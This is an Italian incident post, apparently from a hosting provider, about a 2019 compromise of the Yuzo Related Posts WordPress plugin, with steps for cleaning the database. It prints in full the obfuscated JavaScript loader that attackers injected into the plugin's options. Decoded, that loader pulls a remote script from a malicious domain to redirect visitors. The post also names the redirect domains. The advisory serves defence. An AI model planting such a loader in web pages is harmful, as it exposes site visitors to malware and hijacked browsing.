Yuzo Related Posts Vulnerability and Exploit 0day in the wild. Vulnerabilità Yuzo Related Post Plugin Wordpress. - 🏆 Managed Server
10 Aprile 2019

Yuzo Related Posts Vulnerability and Exploit 0day in the wild. Vulnerabilità Yuzo Related Post Plugin WordPress.

Condividi su facebook
Condividi su twitter
Condividi su linkedin
Condividi su whatsapp
Condividi su email
Print Friendly, PDF & Email

Circa un’ora fa, una pagina WordPress che gestiamo ha iniziato a reindirizzare a pagine di Advertising / Malware.

Ho trovato la fonte del reindirizzamento, desidero fornire assistenza agli altri interessati e ho bisogno di aiuto per trovare la vulnerabilità effettiva e / o una correzione.

Il reindirizzamento avviene dopo che il sito ha terminato il caricamento, quindi cercavo uno snippet di codice JavaScript nella pagina e reindirizzamenti dubbi nel Network Analyzer. I reindirizzamenti malevoli evidenti sono stati: hellofromhony.org, thebiggestfavoritemake.com, nnatrevaleur.tk.

Sono stato in grado di rintracciare i reindirizzamenti in arrivo da https://hellofromhony.org/counter che è incorporato tramite un frammento di codice.

Lo snippet era incorporato in wp_options in una voce con la chiave ‘yuzo_related_post_options’ – più specificamente incorporato nell’opzione json ‘yuzo_related_post_css_and_style’ del option_value.

Questa opzione fa parte del plugin dei post correlati di Yuzo, che è stato interrotto circa una settimana fa: https://wordpress.org/plugins/yuzo-related-post/

YUZO Related Posts vulnerabilità e fix

La rimozione di questo plugin ha interrotto immediatamente il reindirizzamento, non sono stato in grado di trovare altre tracce di manomissione del sito.

Nello specifico è bene seguire i seguenti passaggi per mettere al sicuro il proprio sito :

– Rimuovi / Disinstalla il plugin immediatamente.
– All’interno del tuo database vai alla wp_optionstabella e cerca il valore yuzo_related_post_optionscancella quel record.
– Non eliminare la tabella delle visite wp_yuzoviews, questo non influenza il problema.

Lo snippet che era nel option_value:

</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>

Durante la rimozione del plug-in viene visualizzato un quickfix, voglio approfondire ulteriormente per assicurarmi che non ci sia accesso al database, al backend e allo spazio web.

Se anche voi siete vittime di questo attacco e non siete in grado di risolvere questo problema in autonomia, chiedete pure il nostro aiuto tramite il servizio di Rimozione Malware e Virus WordPress.

Update a breve di Yuzo Related Posts

Come comunicato dall’autore del Plugin a breve verrà rilasciato un upgrade del plugin sebbene il plugin sia cessato esattamente qualche giorno fa a Marzo 2019. Non rimane che eseguire gli step sopra indicati e aspettare la nuova release.

17279

Vuoi ricevere i migliori consigli ?

Ogni settimana nuovi consigli e novità !

Hai dei dubbi? Non sai da dove partire? Contattaci


Abbiamo tutte le risposte alle tue domande per aiutarti nella giusta scelta.

Scrivici

Chatta direttamente con il nostro supporto tecnico.

0256569681

Chiamaci subito negli orari d’ufficio 9:30 – 19:30

Ricevi assistenza

Apri un ticket direttamente nell’area di supporto.

INFORMAZIONI

ManagedServer.it è il principale provider italiano di soluzioni hosting ad alte performance. Il nostro modello di sottoscrizione ha costi contenuti e prevedibili, affinché i clienti possano accedere alle nostre affidabili tecnologie di hosting, server dedicati e cloud. ManagedServer.it offre, inoltre, eccellenti servizi di supporto e consulenza su Hosting dei principali CMS Open Source come WordPress, WooCommerce, Drupal, Prestashop, Magento.

Conosci i problemi di performance del tuo sito ?Analisi Gratuita
+ +

NEWSLETTER

Vuoi scoprire i migliori segreti su hosting e performance ? 

Riceverai i migliori consigli per un sito web veloce e performante 

No grazie, preferisco un sito lento
Torna su